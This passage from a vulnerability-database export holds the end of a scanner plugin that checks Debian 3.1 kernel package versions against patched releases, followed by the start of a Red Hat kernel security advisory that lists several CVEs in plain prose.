(deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-686-smp\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-k6\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-k7\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-k7-smp\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.6.8-3-386\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.6.8-3-686\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.6.8-3-686-smp\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.6.8-3-k7\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.6.8-3-k7-smp\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-2\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3-power3\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3-power3-smp\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3-power4\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3-power4-smp\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3-powerpc\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-3-powerpc-smp\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-power3\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-power3-smp\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-power4\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-power4-smp\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-powerpc\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.6.8-powerpc-smp\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-doc-2.6.8\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-32\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-32-smp\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-386\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-64\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-64-smp\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-686\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-686-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-amd64-generic\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-amd64-k8\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-amd64-k8-smp\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-em64t-p4\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-em64t-p4-smp\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-generic\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-itanium\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-itanium-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-k7\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-k7-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-mckinley\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-mckinley-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-sparc32\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-sparc64\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6-sparc64-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-11\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-11-amd64-generic\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-11-amd64-k8\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-11-amd64-k8-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-11-em64t-p4\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-11-em64t-p4-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-12\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-12-amd64-generic\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-12-amd64-k8\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-12-amd64-k8-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-12-em64t-p4\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-12-em64t-p4-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-32\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-32-smp\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-386\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-64\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-64-smp\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-686\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-686-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-generic\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-itanium\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-itanium-smp\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-k7\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-k7-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-mckinley\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-mckinley-smp\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-sparc32\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-sparc64\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-2-sparc64-smp\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-32\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-32-smp\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-386\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-64\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-64-smp\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-686\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-686-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-generic\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-itanium\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-itanium-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-k7\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-k7-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-mckinley\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-mckinley-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-sparc32\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-sparc64\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.6.8-3-sparc64-smp\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-powerpc\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-powerpc-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-32\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-32-smp\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-386\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-64\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-64-smp\", reference:\"2.6.8-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-686\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-686-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-amd64-generic\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-amd64-k8\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-amd64-k8-smp\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-em64t-p4\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-em64t-p4-smp\", reference:\"103sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-generic\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-itanium\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-itanium-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-k7\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-k7-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-mckinley\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-mckinley-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-power3\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-power3-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-power4\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-power4-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-powerpc\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-powerpc-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-sparc32\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-sparc64\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6-sparc64-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-11-amd64-generic\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-11-amd64-k8\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-11-amd64-k8-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-11-em64t-p4\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-11-em64t-p4-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-12-amd64-generic\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-12-amd64-k8\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-12-amd64-k8-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-12-em64t-p4\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-12-em64t-p4-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-32\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-32-smp\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-386\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-64\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-64-smp\", reference:\"2.6.8-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-686\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-686-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-generic\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-itanium\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-itanium-smp\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-k7\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-k7-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-mckinley\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-mckinley-smp\", reference:\"2.6.8-14sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-s390\", reference:\"2.6.8-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-s390-tape\", reference:\"2.6.8-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-s390x\", reference:\"2.6.8-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-smp\", reference:\"2.6.8-16sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-sparc32\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-sparc64\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-2-sparc64-smp\", reference:\"2.6.8-15sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-32\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-32-smp\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-386\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-64\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-64-smp\", reference:\"2.6.8-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-686\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-686-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-generic\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-itanium\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-itanium-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-k7\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-k7-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-mckinley\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-mckinley-smp\", reference:\"2.6.8-14sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-power3\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-power3-smp\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-power4\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-power4-smp\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-powerpc\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-powerpc-smp\", reference:\"2.6.8-12sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-s390\", reference:\"2.6.8-5sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-s390-tape\", reference:\"2.6.8-5sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-s390x\", reference:\"2.6.8-5sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-smp\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-sparc32\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-sparc64\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-3-sparc64-smp\", reference:\"2.6.8-15sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-amiga\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-atari\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-bvme6000\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-hp\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-mac\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-mvme147\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-mvme16x\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-power3\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-power3-smp\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-power4\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-power4-smp\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-powerpc\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-powerpc-smp\", reference:\"2.6.8-12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-q40\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.6.8-sun3\", reference:\"2.6.8-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-power3\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-power3-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-power4\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-power4-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-powerpc\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-powerpc-smp\", reference:\"102sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-2.6.8-s390\", reference:\"2.6.8-5sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-debian-2.6.8\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-source-2.6.8\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-tree-2.6.8\", reference:\"2.6.8-16sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mol-modules-2.6.8-3-powerpc\", reference:\"0.9.70+2.6.8+12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mol-modules-2.6.8-3-powerpc-smp\", reference:\"0.9.70+2.6.8+12sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"ndiswrapper-modules-2.6.8-3-386\", reference:\"1.1-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"ndiswrapper-modules-2.6.8-3-686\", reference:\"1.1-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"ndiswrapper-modules-2.6.8-3-686-smp\", reference:\"1.1-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"ndiswrapper-modules-2.6.8-3-k7\", reference:\"1.1-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"ndiswrapper-modules-2.6.8-3-k7-smp\", reference:\"1.1-2sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:35", "description": "Updated kernel packages that fix a number of security issues as well\nas other bugs are now available for Red Hat Enterprise Linux 2.1 (32\nbit architectures)\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a race condition that allowed local users to read the\n environment variables of another process (CVE-2004-1058,\n low)\n\n - a flaw in the open_exec function of execve that allowed\n a local user to read setuid ELF binaries that should\n otherwise be protected by standard permissions.\n (CVE-2004-1073, moderate). Red Hat originally reported\n this flaw as being fixed by RHSA-2004:504, but a patch\n for this issue was missing from that update.\n\n - a flaw in the coda module that allowed a local user to\n cause a denial of service (crash) or possibly gain\n privileges (CVE-2005-0124, moderate)\n\n - a potential leak of kernel data from ext2 file system\n handling (CVE-2005-0400, low)\n\n - flaws in 